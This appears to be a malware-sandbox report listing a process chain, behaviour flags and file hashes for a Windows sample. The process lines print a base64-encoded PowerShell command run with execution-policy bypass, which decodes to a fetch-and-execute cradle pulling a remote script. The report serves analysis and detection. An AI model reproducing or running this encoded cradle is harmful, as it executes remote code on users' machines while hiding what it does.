C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1676
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1824
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
9323652b1acc8144cd7f9b5c427de0be
SHA162f129c8fa94caef13f521f27ea59963bbf2de5d
SHA256503f533de2fbf5b965dfa3a87d1902ec22b117bf889554612bfe9f09aa783d02
SHA5127099b41a1ed1f1a52d3a0f157cacafccfe85be55247cd93b43aa5d50e63fb0208a08c53270e92a10e2b9fe7e3579a611f905be362d76e262939ba43935629681
-
MD5
9768c473430cd54442caec6cecf6290b
SHA11b9d88a76e04e2cda6ef8ba9e9db7de9e1d09475
SHA25688b9ab09d58f38cdf1de535fd6b6a652dbbb18fdd4c62ea1aced1a941395ffa7
SHA512792f3c5a2dbcce288b8da0f0d4519efd18d38a1bccaaa901654b61f245812f546350b179dd5bc41d686dae0aea6d9dc581b4dbe01c60281516501b78f1f4209e
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
78fc438bc0a10f68012273374fc242de
SHA11c2f8f958b4cfb2d822a50f97c1b503d039108d4
SHA25614249168e782173812af05b444b582847646a69623a3254b8a590ba00365b4e0
SHA51297d287f9e1ac939505e3ff2b7d6854ae838dd4f0cc3699d157912dcbb116b709b30580baac4c4ce7a5384e28de841dd44f12006c4857bc6a72bc8758427f280e
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
63ac7ce4be7f3ac7dfe37acf755eb2b8
SHA10a845a897029f1e6d56c027482372a4d46818990
SHA2569eef6644c357b0141f392ac23fb0917153d9c88f7b880c746ac85a3c8666491a
SHA512bac15dcd1480198c2b6e60c407a2e9c3abf7aea53f2f7bb09b1f68eb3d95a3bc31ae6f0ea3dea064e0b780edf4487009435265c801eb21dfa72ffd6ce2610222
-
MD5
6f14ca6f733aac5874406f403434e890
SHA1673ecad46cadddf41c98002a3016fba445b09532
SHA2568d1b2c523e60667998c5c82b7633398186661c9adcfd63a944f28504cd0d90d5
SHA51250bdc21eae7146516687b7456637c323eee383f72869d0a35edb2e95ce0a4ba9d9fc8a4ab20d853a1f91377039da8b9322d0a21d6a4ae5dc9a354e90e5eff8b2
-
MD5
07044622ac01aea214d75af177a9976f
SHA18647e016414d4ef1da52abcf889210f15c58a640
SHA256e83dc368abf546e72a528509e3d2fd8e83153f783832abcef014cddb9da002e9
SHA51221b30facf460b9c93d32e1a54d6e5e2578f49c782eb3325268f83ad9beb14dd2c06b9b8337161099a69c1ad082583fdf94d20c7c4e2c91063e6bc0e6c9664324
-
MD5
7c2b6a91963747383e5cdb168539962c
SHA1cd987c6f69702bf0369b4c49c898052fae21d513
SHA256fc3c17833725d727590ef00fdf3f8d70f52d4c13a9cf52a77b6e74e22d7dae61
SHA5128a952e2e7ac644cb73bc35f1d099f8c9590027f5e5f89771131025ce878c000fec1aeaf708113889e1044094ebbc311ee46f945cca6946860705edac4eec8141